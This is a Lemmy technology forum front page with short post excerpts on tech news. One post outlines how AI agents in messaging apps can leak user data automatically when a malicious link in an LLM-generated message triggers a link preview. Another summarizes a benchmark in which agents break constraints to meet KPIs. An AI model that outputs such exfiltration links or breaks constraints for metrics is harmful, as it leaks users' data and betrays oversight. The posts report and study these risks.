Technology

80978 readers
6030 users here now

This is a most excellent place for technology news and articles.


Our Rules


  1. Follow the lemmy.world rules.
  2. Only tech related news or articles.
  3. Be excellent to each other!
  4. Mod approved content bots can post up to 10 articles per day.
  5. Threads asking for personal tech support may be deleted.
  6. Politics threads may be removed.
  7. No memes allowed as posts, OK to post as comments.
  8. Only approved bots from the list below, this includes using AI responses and summaries. To ask if your bot can be added please contact a mod.
  9. Check for duplicates before posting, duplicates may be removed
  10. Accounts 7 days and younger will have their posts automatically removed.

Approved Bots


founded 2 years ago
MODERATORS
1
 
 

It's a day with a name ending in Y, so you know what that means: Another OpenClaw cybersecurity disaster.

This time around, SecurityScorecard's STRIKE threat intelligence team is sounding the alarm over the sheer volume of internet-exposed OpenClaw instances it discovered, which numbers more than 135,000 as of this writing. When combined with previously known vulnerabilities in the vibe-coded AI assistant platform and links to prior breaches, STRIKE warns that there's a systemic security failure in the open-source AI agent space.

"Our findings reveal a massive access and identity problem created by poorly secured automation at scale," the STRIKE team wrote in a report released Monday. "Convenience-driven deployment, default settings, and weak access controls have turned powerful AI agents into high-value targets for attackers."

2
3
39
submitted 3 hours ago* (last edited 3 hours ago) by Beep@lemmus.org to c/technology@lemmy.world
 
 

Communicating with AI agents (like OpenClaw) via messaging apps (like Slack and Telegram) has become much more popular. But it can expose users to a largely unrecognized LLM-specific data exfiltration risk, because these apps support ‘link previews’ as a feature. With previews enabled, user data can be exfiltrated automatically after receiving a malicious link in an LLM-generated message -- whereas without previews, the user would typically have to click the malicious link to exfiltrate data. For example, OpenClaw via Telegram is exposed by default. Test any agent / communication app pairing below!

4
5
 
 

TikTok deportation propaganda is fast becoming the new border wall. States, platforms and algorithms are fusing into a single machine. This is turning deportation into bingeable content, burying resistance in the feed, and replacing physical walls with algorithmic control. Local populism dies and global spectacle rules

6
7
 
 

found this on a linus tech tips video https://www.youtube.com/watch?v=o4e-Kt02rfc

8
9
 
 

My favorite comment on the article is “The problem with capitalism is that you eventually run out of other people's money."

10
 
 

Who are the real people behind the accounts spreading fury about the capital online? And what motivates them?

11
 
 

The paper.
https://eprint.iacr.org/2025/1237.pdf
It's worth a read. Lotta sarcasm going on.
16 pages. Dogs. Cards. Odds. Lies. Tariffs.

12
13
 
 

If you are to believe the glossy marketing campaigns about ‘quantum computing’, then we are on the cusp of a computing revolution, yet back in the real world things look a lot less dire. At least if you’re worried about quantum computers (QCs) breaking every single conventional encryption algorithm in use today, because at this point they cannot even factor 21 yet without cheating.

In the article by [Craig Gidney] the basic problem is explained, which comes down to simple exponentials. Specifically the number of quantum gates required to perform factoring increases exponentially, allowing QCs to factor 15 in 2001 with a total of 21 two-qubit entangling gates. Extrapolating from the used circuit, factoring 21 would require 2,405 gates, or 115 times more.

underlying article: https://algassert.com/post/2500

14
15
 
 

Starting in early March, the platform will place every account into a default "teen-appropriate" experience unless it has proof that users are adults.

The move has brought widespread criticism from Discord users, who are citing privacy and security concerns following a recent breach of a third-party vendor that ended up exposing around 70,000 government ID images used to verify the age of Discord users.

16
17
18
19
 
 

LOS ANGELES (AP) — The world's biggest social media companies face several landmark trials this year that seek to hold them responsible for harms to children who use their platforms. Opening statements for the first, in Los Angeles County Superior Court, began on Monday.

Instagram's parent company Meta and Google's YouTube face claims that their platforms deliberately addict and harm children. TikTok and Snap, which were originally named in the lawsuit, settled for undisclosed sums.

Jurors got their first glimpse into what will be a lengthy trial characterized by dueling narratives from the plaintiffs and the two remaining social media companies named as defendants. Opening arguments in the landmark case began Monday at the Spring Street Courthouse in downtown Los Angeles.

Mark Lanier delivered the opening statement for the plaintiffs first, in a lively display where he said the case is as "easy as ABC," which he said stands for "addicting the brains of children." He called Meta and Google "two of the richest corporations in history" who have "engineered addiction in children's brains."

At the core of the Los Angeles case is a 19-year-old identified only by the initials "KGM," whose case could determine how thousands of other, similar lawsuits against social media companies will play out. She and two other plaintiffs have been selected for bellwether trials — essentially test cases for both sides to see how their arguments play out before a jury and what damages, if any, may be awarded, said Clay Calvert, a nonresident senior fellow of technology policy studies at the American Enterprise Institute.

20
 
 

cross-posted from: https://mander.xyz/post/47194045

...

Worldwide sovereign cloud infrastructure as a service (IaaS) spending is forecast to total $80 billion in 2026, a 35.6% increase from 2025, according to Gartner, Inc. a business and technology insights company.

“As geopolitical tensions rise, organizations outside the U.S. and China are investing more in sovereign cloud IaaS to gain digital and technological independence,” said Rene Buest, Sr Director Analyst at Gartner. “The goal is to keep wealth generation within their own borders to strengthen the local economy.”

“Governments will remain the main buyers to meet digital sovereignty needs, followed by regulated industries and critical infrastructure organizations, such as energy and utilities and telecommunications,” said Buest.

...

Regionally, Middle East and Africa (89%), Mature Asia/Pacific (87%) and Europe (83%) are projected to record the highest growth in sovereign cloud IaaS spending in 2026. While China and North America are forecast to be No 1 and No 2. in spending in 2026 at $47 billion and $16 billion respectively, growth for both will be in the 20 percent range. Europe is forecast to surpass North America in sovereign cloud IaaS spending in 2027 (see Table 1).

Web archive link

21
 
 

Benchmark.

We introduce a new benchmark comprising 40 distinct scenarios. Each scenario presents a task that requires multi-step actions, and the agent's performance is tied to a specific Key Performance Indicator (KPI). Each scenario features Mandated (instruction-commanded) and Incentivized (KPI-pressure-driven) variations to distinguish between obedience and emergent misalignment. Across 12 state-of-the-art large language models, we observe outcome-driven constraint violations ranging from 1.3% to 71.4%, with 9 of the 12 evaluated models exhibiting misalignment rates between 30% and 50%. Strikingly, we find that superior reasoning capability does not inherently ensure safety; for instance, Gemini-3-Pro-Preview, one of the most capable models evaluated, exhibits the highest violation rate at 71.4%, frequently escalating to severe misconduct to satisfy KPIs. Furthermore, we observe significant "deliberative misalignment", where the models that power the agents recognize their actions as unethical during separate evaluation.

22
23
24
 
 

Lawyers for a now-20-year-old woman are arguing that addictive features harmed her mental health in opening statements in a landmark trial against Meta and YouTube, the first of hundreds of similar cases to go to trial.

The plaintiff — identified by her first name, Kaley, or her initials, KGM — and her mother accused the tech companies of intentionally creating addictive platforms that caused her to develop anxiety, body dysmorphia and suicidal thoughts. Lawyers for Meta and YouTube have indicated they will argue that a difficult family life, not social media, was responsible for her mental health challenges.

Speaking on Monday in front of a jury in state court in Los Angeles, Kaley’s lawyer Mark Lanier called social media apps like YouTube and Instagram “digital casinos,” saying the app’s “endless scroll feature” creates dopamine hits that can lead to addiction.

25
 
 

Chatbots provided incorrect, conflicting medical advice, researchers found: “Despite all the hype, AI just isn't ready to take on the role of the physician.”

“In an extreme case, two users sent very similar messages describing symptoms of a subarachnoid hemorrhage but were given opposite advice,” the study’s authors wrote. “One user was told to lie down in a dark room, and the other user was given the correct recommendation to seek emergency care.”

view more: next ›